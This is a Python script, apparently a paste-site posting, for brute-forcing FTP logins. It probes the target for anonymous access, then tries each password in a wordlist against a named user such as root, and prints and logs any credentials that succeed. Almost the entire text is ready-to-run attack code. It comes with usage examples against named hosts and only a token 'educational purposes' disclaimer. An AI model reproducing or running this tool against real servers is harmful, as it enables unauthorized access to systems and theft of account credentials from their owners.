[Python] FTP Bruteforcer

1. #!/usr/bin/python
2. # -*- coding: utf-8 -*-
3. ############################################################
4. # ______ _______ _____ ____ _ #
5. # | ____|__ __| __ \ | _ \ | | #
6. # | |__ | | | |__) |_____| |_) |_ __ _ _| |_ ___ #
7. # | __| | | | ___/______| _ | |__| | | | __/ _ \ #
8. # | | | | | | | |_) | | | |_| | || __/ #
9. # |_| |_| |_| |____/|_| \__,_|\__\___| #
10. # #
11. ############################################################
12. #This program was made for educational purposes only, using
13. #for malicious use is strictly forbidden, I'm not responsible
14. #for any misuse of this program, Copy rights pend to Chris Poole.
15. ################################################################
16. # _____ _ _ _ __ #
17. # / ____| | (_) | _ \ \ #
18. # | | _ __ ___ __| |_| |_ ___ (_) | | #
19. # | | | '__/ _ \/ _` | | __/ __| | | #
20. # | |____| | | __/ (_| | | |_\__ \ _ | | #
21. # \_____|_| \___|\__,_|_|\__|___/ (_) | | #
22. # /_/ #
23. # #
24. ################################################################
25. # http://twitter.com/codingplanets // Chris Poole #
26. ################################################################
27. import sys
28. import time
29. import os
30. from ftplib import FTP
31.  
32. if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
33. SysCls = 'clear'
34. elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
35. SysCls = 'cls'
36. else:
37. SysCls = 'unknown'
38.  
39. log = "ftpbrute.log"
40. face = '''
41. ______ _______ _____ ____ _
42. | ____|__ __| __ \ | _ \ | |
43. | |__ | | | |__) | ____ | |_) |_ __ _ _| |_ ___
44. | __| | | | ___/ ____ | _ | |__| | | | __/ _ \
45. | | | | | | | |_) | | | |_| | || __/
46. |_| |_| |_| |____/|_| \__,_|\__\___|
47.  
48.  
49. FTP = File Transfer Protocol
50. Bruteforcing = Retriving login access with a passwordlist
51. ___________________________________________________________________
52. '''
53.  
54. option = '''
55. Usage: python ftpbrute.py [options]
56. Options: -t, <hostname/ip> | Target to bruteforcing
57. -u, <user> | User for bruteforcing
58. -w, <filename> | Passwords used for bruteforcing
59. -h, <help> | print this help
60.  
61. Example: python ftpbrute.py -t 192.168.1.1 -u root -w passwords.txt
62. Example: python ftpbrute.py -t binarysec.org -u root -w list.txt
63. ___________________________________________________________________
64. '''
65.  
66. file = open(log, "a")
67.  
68. def MyFace() :
69. os.system(SysCls)
70. print face
71. file.write(face)
72.  
73. print option
74.  
75. def HelpMe() :
76. MyFace()
77. file.write(option)
78. sys.exit(1)
79.  
80. for arg in sys.argv:
81. if arg.lower() == '-t' or arg.lower() == '--target':
82. hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
83. elif arg.lower() == '-u' or arg.lower() == '--user':
84. user = sys.argv[int(sys.argv[1:].index(arg))+2]
85. elif arg.lower() == '-w' or arg.lower() == '--wordlist':
86. wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
87. elif arg.lower() == '-h' or arg.lower() == '--help':
88. HelpMe()
89. elif len(sys.argv) <= 1:
90. HelpMe()
91.  
92. def checkanony() :
93. try:
94. print "\n[+] Checking for anonymous login\n"
95. ftp = FTP(hostname)
96. ftp.login()
97. ftp.retrlines('LIST')
98. print "\n[!] Anonymous login successfuly !\n"
99. ftp.quit()
100. except Exception, e:
101. print "\n[-] Anonymous login unsuccessful...\n"
102. pass
103.  
104.  
105. def BruteForce(word) :
106. sys.stdout.write ("\r[?]Trying : %s " % (word))
107. sys.stdout.flush()
108. file.write("\n[?]Trying :"+word)
109. try:
110. ftp = FTP(hostname)
111. ftp.login(user, word)
112. ftp.retrlines('list')
113. ftp.quit()
114. print "\n\t[!] Login Success ! "
115. print "\t[!] Username : ",user, ""
116. print "\t[!] Password : ",word, ""
117. print "\t[!] Hostname : ",hostname, ""
118. print "\n\tThank you for using my FTP bruteforcer! :)"
119. print "\n\tCredits | @codingplanets | Chris Poole"
120. print "\n\t "
121. print "\t[!] Log all has been saved to",log,"\n"
122. file.write("\n\n\t[!] Login Success ! ")
123. file.write("\n\t[!] Username : "+user )
124. file.write("\n\t[!] Password : "+word )
125. file.write("\n\t[!] Hostname : "+hostname)
126. file.write("\n\t[!] Log all has been saved to "+log)
127. file.write("\n\n\tThank you for using my FTP bruteforcer! :)")
128. file.write("\n\n\tCredits | @codingplanets | Chris Poole")
129. file.write("\n\n\t ")
130.  
131.  
132.  
133. sys.exit(1)
134. except Exception, e:
135. #print "[-] Failed"
136. pass
137. except KeyboardInterrupt:
138. print "\n[-] Aborting...\n"
139. file.write("\n[-] Aborting...\n")
140. sys.exit(1)
141.  
142. MyFace()
143. print "[!] Starting attack at %s" % time.strftime("%X")
144. print "[!] System Activated for brute forcing..."
145. print "[!] Please wait until brute forcing finish !\n"
146. file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
147. file.write("\n[!] System Activated for brute forcing...")
148. file.write("\n[!] Please wait until brute forcing finish !\n")
149. checkanony()
150.  
151. try:
152. preventstrokes = open(wordlist, "r")
153. words = preventstrokes.readlines()
154. count = 0
155. while count < len(words):
156. words[count] = words[count].strip()
157. count += 1
158. except(IOError):
159. print "\n[-] Error: Check your wordlist path\n"
160. file.write("\n[-] Error: Check your wordlist path\n")
161. sys.exit(1)
162.  
163. print "\n[+] Loaded:",len(words),"words"
164. print "[+] Server :",hostname
165. print "[+] User :",user
166. print "[+] BruteForcing...\n"
167.  
168. for word in words:
169. BruteForce(word.replace("\n",""))
170.  
171. file.close()